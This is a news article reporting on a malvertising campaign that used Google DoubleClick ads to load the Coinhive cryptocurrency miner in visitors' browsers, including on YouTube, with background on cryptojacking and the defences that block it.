YouTube

Some smart crooks found a way to insert and deliver the Coinhive in-browser miner inside ads delivered via the Google DoubleClick ad delivery platform.

Ads delivered this way made their way on countless sites, and even on Google's own property —YouTube.

A Trend Micro report released today claims the crooks behind this campaign started abusing Google's DoubleClick platform to deliver the Coinhive in-browser miner around January 18 and significantly ramped up operations on January 23.

Coinhive detections in recent DoubleClick malvertising campaign

The chart above shows Coinhive detections for this malvertising campaign abusing Google DoubleClick.

Crooks deployed Coinhive on YouTube on January 23

The huge spike represents the moment when crooks decided to deliver the Coinhive-tainted ads on YouTube, the world's largest video hosting platform.

Reports immediately started appearing on Twitter [1, 2, 3, 4, 5, 6, 7, 8]. According to some of these reports, various antivirus products began detecting the Coinhive cryptojacker when users were visiting YouTube, a place where Coinhive would have never been able to load except via malicious JavaScript code hidden in one of the numerous ads displayed on video pages.

The Coinhive service appeared last September and has described itself as a website monetization service that could be employed as an alternative to classic online ads. The service uses JavaScript code to mine the Monero cryptocurrency inside the browser of a site's visitor.

Despite its good intentions, the service has been abused by crooks, who load the Coinhive in-browser miner on hacked sites, via malicious ads, inside desktop apps and game mods, and any other place that can run JavaScript code.

After Coinhive's initial success, various similar services have also launched online. These services operate by taking a small cut of the cryptocurrency website owners mine using their visitors' PCs.

This practice of secretly loading a JavaScript miner inside browsers and other JS-capable apps is being called cryptojacking or drive-by mining.

Currently, only ad blockers, no-JavaScript browser extensions, and antivirus products have proven efficient at blocking cryptojacking scripts.

Related Articles:

Cryptojacking Script Found in Live Help Widget, Impacts Around 1,500 Sites

In-Browser Cryptojacking Is Getting Harder to Detect

Image Previewer: First Firefox Addon that Injects an In-Browser Miner?

Drupal Sites Fall Victims to Cryptojacking Campaigns

New MassMiner Malware Targets Web Servers With an Assortment of Exploits